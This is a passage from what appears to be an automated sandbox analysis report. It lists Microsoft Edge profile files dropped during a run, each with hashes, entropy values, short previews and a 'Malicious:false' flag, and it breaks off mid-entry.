                                                                                                                                                                                                                                                                                              SHA-512:76272BC522AA63E8397CE2ECF0FE59A409C29F04034A70682202115257725CAAAFC2D0924041FFB1818A23090E9704F49D730C9391D67EE8961E13D067C0F10C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.020 1d48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/10-12:40:19.125 1d48 Recovering log #3.2024/12/10-12:40:19.138 1d48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1574698967407056
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L86VXk3+q2P923oH+TcwtpIFUt8OL86WrZmw+OL86EtVkwO923oH+Tcwta/WLJ:7AKv4YebmFUt8OAvr/+OAP5LYebaUJ
                                                                                                                                                                                                                                                                                              MD5:3CB259D27A59A56886D24DA6E37CDD44
                                                                                                                                                                                                                                                                                              SHA1:45AC996A60EA57F9590D59D9E8E41A2138C3B9A8
                                                                                                                                                                                                                                                                                              SHA-256:46B6F08557BAB6873E69D282F70BA6CA3C0C51BEC7FCCE915EB848EBC48968E3
                                                                                                                                                                                                                                                                                              SHA-512:76272BC522AA63E8397CE2ECF0FE59A409C29F04034A70682202115257725CAAAFC2D0924041FFB1818A23090E9704F49D730C9391D67EE8961E13D067C0F10C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.020 1d48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/10-12:40:19.125 1d48 Recovering log #3.2024/12/10-12:40:19.138 1d48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):131072
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0033616753448762224
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:ImtVuAZ+RMkllllll:IiVuAAKktll
                                                                                                                                                                                                                                                                                              MD5:803636E9422FEC29F979EDFEBC6FBC2F
                                                                                                                                                                                                                                                                                              SHA1:EAABF4A7D94E995936D0CB12B28460BFFF0CED1E
                                                                                                                                                                                                                                                                                              SHA-256:0A1F6450F51FF2879B65129C141DEBD06F00EDDC88DCEBD13FD170CDC2A2EB61
                                                                                                                                                                                                                                                                                              SHA-512:AF4A9536B569871FC2666236B30D7F34C92092717881DF99758C7A61B515D323AC87461AECE52A6AFF296909981BC458AA1B82E15A18F99793053C0DFB61BA66
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:VLnk.....?......?......+................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):196608
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2651482717873037
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:8/2qOB1nxCkMoSAELyKOMq+8yC8F/YfU5m+OlTLVum6V:Bq+n0Jo9ELyKOMq+8y9/Owj
                                                                                                                                                                                                                                                                                              MD5:5328AC2315C2008B564F8BA6D6CB0DD4
                                                                                                                                                                                                                                                                                              SHA1:163DC576E30F664A2CFF034EF79B1F972C9D1CB9
                                                                                                                                                                                                                                                                                              SHA-256:F3C3CA7A5D904E01C1B4D0771C563C68AD589311AD83936E8733412FC525F110
                                                                                                                                                                                                                                                                                              SHA-512:2BCE20972FC45CB800F7A5CEFB3AF8C03049A8B0214045F83941BFEB9EDE40E54AACBCE16A92B3B1C7E904729D98CF6E46B90D878E983CB19AF3888DCB48AA1F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data-journal

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2568
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.06569804787746028
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:BLN/l1l3/PlvB:9//P
                                                                                                                                                                                                                                                                                              MD5:FDC304CA685E019F7B37CE6BB87EDDA6
                                                                                                                                                                                                                                                                                              SHA1:A44DBCAE799F4C2C213A8DFD42571D41770A519A
                                                                                                                                                                                                                                                                                              SHA-256:2742BC7DD6DFB8C6A4412A4D380FFB25C0DCDA827E87627BD604B261CCD4A667
                                                                                                                                                                                                                                                                                              SHA-512:FC5D8965F518E0F8DE640BB1CA56F426B37D3B3E1B2D00AAE96B0AB89445E1D55C985B28654CC7F6EE3E9A8E1532931AF1FEAAAA79D50F6E61365EB3E9DFA8FF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:............q.....`.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.41235120905181716
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB:v7doKsKuKZKlZNmu46yjx
                                                                                                                                                                                                                                                                                              MD5:981F351994975A68A0DD3ECE5E889FD0
                                                                                                                                                                                                                                                                                              SHA1:080D3386290A14A68FCE07709A572AF98097C52D
                                                                                                                                                                                                                                                                                              SHA-256:3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
                                                                                                                                                                                                                                                                                              SHA-512:C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):11755
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                              MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                              SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                              SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                              SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\bbbd1381-e11d-4601-8fca-a44252fa16a1.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c2732dff-2a9a-4b7d-b9a8-31904978efda.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):13333
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.265991180621583
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:stMPGo4Su4sfgfhOkdbGix6WuOBylaTYG:sOOoPuzgfpdbGixuaTYG
                                                                                                                                                                                                                                                                                              MD5:9F86BDC01445905FC9F04EB55AAC62F3
                                                                                                                                                                                                                                                                                              SHA1:8C545DE1B60B4C36540583E9474F4E7296CC5533
                                                                                                                                                                                                                                                                                              SHA-256:41363EFE3A4C864B8B04D1CBC422F7ADF50E34C828B3B31064E94065E8859E93
                                                                                                                                                                                                                                                                                              SHA-512:0A2CC6B9C5DB2356221DBC6DD719546CB65BD4134406AFF6B5B51B8D7C25A0D21D1239F908A5494446946A4FA712C90E40922F92DEFD8C2BE7DF0FEFCA8CF458
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326020367279","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                              MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                              SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                              SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                              SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e5dc6517-7f7e-4d17-880c-8a748134a85e.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.061050455116055224
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:Gy0Lx7oI0LxjB89XCChslotGLNl0ml/Vl/Vl/U8oQXmlXCUWls:Cl7ohljBspEjVl/PnvoQW1
                                                                                                                                                                                                                                                                                              MD5:7DA86CF48DB6DE17DAF5C48F40CCF47B
                                                                                                                                                                                                                                                                                              SHA1:0493F2DF846249AF85D1581D4444D9887F37FC27
                                                                                                                                                                                                                                                                                              SHA-256:D145B4DBAFC9FF8B7C0DCE09CD49073F7EC79D785C1D66946DBF3C6899A7ABF6
                                                                                                                                                                                                                                                                                              SHA-512:D47F3D236C024B74AB32FF673B3F3D609BA5977D3D82F5C951799F6FF304123139F57243710A08156C9F498DF5725C3465A474DA2BD205A157778CA9984C3E56
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:..-.....................N.|.(....4..}.....YE?....-.....................N.|.(....4..}.....YE?..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):119512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.7430526958444003
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:jjx7/02b2dNshTNsOO5NsvlNsEuamKngLA:jt7/02b2oMqvQEl
                                                                                                                                                                                                                                                                                              MD5:FF44BB235CC6F81B3B1F33138F66B6F0
                                                                                                                                                                                                                                                                                              SHA1:3407E8DA5EC9F99D6D21C5EEB104EAA5D90EA8D9
                                                                                                                                                                                                                                                                                              SHA-256:A0BF0097DA749CCB25928F7E52F12E01B4485631290DE3AB6A62DFC0CC16DD7D
                                                                                                                                                                                                                                                                                              SHA-512:7A02EB234342CCB482FA1FEBA1B4ECD7AA174D9DB77B4B061ECE41699A4CA89D3F5671C60FA5E531DAEF3A73CCDC2670AF9BDA9DB8D5DD16DA84EA60CB45FCDC
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4449
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.961456623789735
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:a6JzAD0/2tzcD0/2fquRTezXD0/2L2uIzXD0/2L2uwBz:dgGqiex27x2rz
                                                                                                                                                                                                                                                                                              MD5:42A76926C2AD62D2410E5FEB169E941B
                                                                                                                                                                                                                                                                                              SHA1:C8EA1E07C4E8BEE7F9048DCC7F8687064E999B7C
                                                                                                                                                                                                                                                                                              SHA-256:EB437EDD9451071B31A7AC13FAFD4358A98B3753BFD9DFE3FA89ED78CD8C30F9
                                                                                                                                                                                                                                                                                              SHA-512:3B3DD0AD66141D6FA80666C1AC798E6B639279FA714D16A517E0FA1CDC98A3187E9BB556FF186CC0E6509B2B61D802296010692072DB53AD5EE60C997FA723CD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=.................HU;...............#38_h.......6.Z..W.F.....i.......i............V.e................'..................021_download,ca6df0a6-27a2-442f-a9af-7fd1128b2fb0......$ca6df0a6-27a2-442f-a9af-7fd1128b2fb0...............="...nhttps://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1...https://uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.com/cd/0/get/CgDZZ7NRNr2v450QCTZug7jZFzZJPTsHUwjk_9BNTK-n3A9qdLP6FAO5cFvN4V

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.084338938280817
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7LrQ+q2P923oH+TcwtfrK+IFUt8OLrgZmw+OLrQVkwO923oH+TcwtfrUeLJ:7Vv4Yeb23FUt8Og/+OI5LYeb3J
                                                                                                                                                                                                                                                                                              MD5:185B5812BCA073F4EB3F8FF97C4B9243
                                                                                                                                                                                                                                                                                              SHA1:DED594D4A87164278D73210A7B3215460A2BCF2A
                                                                                                                                                                                                                                                                                              SHA-256:3B1AAAF701D2F44C074257CEF5B8DC8DE3E501FAEEC3B574D1D52664716F3F2C
                                                                                                                                                                                                                                                                                              SHA-512:77A375AE8104235F2D3F40EAA3484C7F5D7A494603AA3D39B3FC6A1A94F653801ADF0F951A6A0CC5879BACDB26611AC880CE675C4C5D29964460BB21D3BA3BDC
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:20.402 1d08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/10-12:40:20.402 1d08 Recovering log #3.2024/12/10-12:40:20.402 1d08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.084338938280817
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7LrQ+q2P923oH+TcwtfrK+IFUt8OLrgZmw+OLrQVkwO923oH+TcwtfrUeLJ:7Vv4Yeb23FUt8Og/+OI5LYeb3J
                                                                                                                                                                                                                                                                                              MD5:185B5812BCA073F4EB3F8FF97C4B9243
                                                                                                                                                                                                                                                                                              SHA1:DED594D4A87164278D73210A7B3215460A2BCF2A
                                                                                                                                                                                                                                                                                              SHA-256:3B1AAAF701D2F44C074257CEF5B8DC8DE3E501FAEEC3B574D1D52664716F3F2C
                                                                                                                                                                                                                                                                                              SHA-512:77A375AE8104235F2D3F40EAA3484C7F5D7A494603AA3D39B3FC6A1A94F653801ADF0F951A6A0CC5879BACDB26611AC880CE675C4C5D29964460BB21D3BA3BDC
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:20.402 1d08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/10-12:40:20.402 1d08 Recovering log #3.2024/12/10-12:40:20.402 1d08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):787
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                                                              MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                                                              SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                                                              SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                                                              SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):342
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.144464220050508
                                                                                                                                                                                                                                                                                              Encrypted:false
